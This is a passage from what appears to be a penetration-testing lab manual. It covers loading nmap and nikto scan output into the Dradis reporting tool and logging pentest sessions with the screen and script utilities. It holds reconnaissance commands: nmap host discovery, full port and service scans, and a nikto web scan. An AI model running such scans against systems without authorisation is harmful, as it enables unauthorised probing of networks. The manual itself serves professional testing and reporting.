http://127.0.0.1:3000. You should see the following screen.

Step 4: Provide the password and click on the continue button.

133
Step 5: After providing the password, In the next screen we will get the username and
password details. Enter any username and enter the password we created in the previous
step. And click on “let me in” button.

Step 6: Once the dradis application is ready you need some tool to output, in case you
haven’t done that you can do with following command syntaxes, or you can export
output with tools like owasp zap, burp, or nexpose etc. Now Generate some scan results.
Examples:
● nmap -sn <network range> -oX <filename.xml>
● nmap -p- -A <ip of the target> -oX <filename.xml>
● nikto -h <targetserverip> -o <filename.xml>

134
● Network scan

● Nikto

135
● Port scan

● Here is the list of files, where the results are generated from scans.

136
Step 7: Now upload the generated results to the dradis application. click on the upload
button.

Step 8: Select your tool from the list and click on the browse button to select the file.

137
Step 9: Navigate to the file location and select the file.

138
Step 10: Wait for a while until the upload is done.

Step 11: Once uploaded, wait till the worker process is completed.

139
Step 12: Repeat the previous steps to upload all of the results to the dradis application
by selecting the appropriate options.

Step 13: Once all of the files are uploaded, we can observe the information of files
uploaded available in the left side panel. (you might want to refresh to update result)
Expand the plugin output see the new info

140
Step 14: Click on the plugin output subsections to see more info on the right panel

141
Step 15: You can make a full report using the export button.

Step 16: Select the template that you preferred and click on the export button to generate
the report.

142
Step 17: The generated report will open in a new tab like this.

143
144
Practical 29: Documenting Pentesting activities using screen tool
in Kali Linux
Description: In this practical we will learn how to use the screen tool to log the
penetration activities to generate the report.

Step 1: Usually the application is already installed in the Kali Linux, If the application is
not installed try the below commands to install it.
1. apt update
2. apt install screen -y

Step 2: You can see there are no files present on the desktop.

Step 3: Execute the below command to start Logging command activity using ‘screen’
tool.
Command: screen -L

Step 4: After starting the screen tool. You can proceed to perform your Pentesting
activities as usual.

145
Step 5: Once your Pentesting activities are done, you can stop logging by executing the
“exit” command.

146
Step 6: After closing the screen tool it will save all the activity into a log file. Now open
the log file by using the nano application.

● You can use cats to see the activity in colors as well.

147
148
Practical 30: Documenting Pentesting activities using script tool
in Kali Linux
Description: In this practical we will learn how to use the screen tool to generate the
report.

Step 1: Usually the application is already installed in the Kali Linux, If the application is
not installed try the below commands to install it.
1. apt update
2. apt install script -y

Step 2: Execute the following command to start logging your terminal activity.
Command: script Pentesting.log

Step 3: Once the script is started; you can start doing your Pentesting activity.

Step 4: After your Pentesting activities are completed, you can type “exit” command to
stop logging your terminal activity.

149
Step 5: Open the file in your text editor (cat can show colorful output) and you can take
necessary screenshots.

150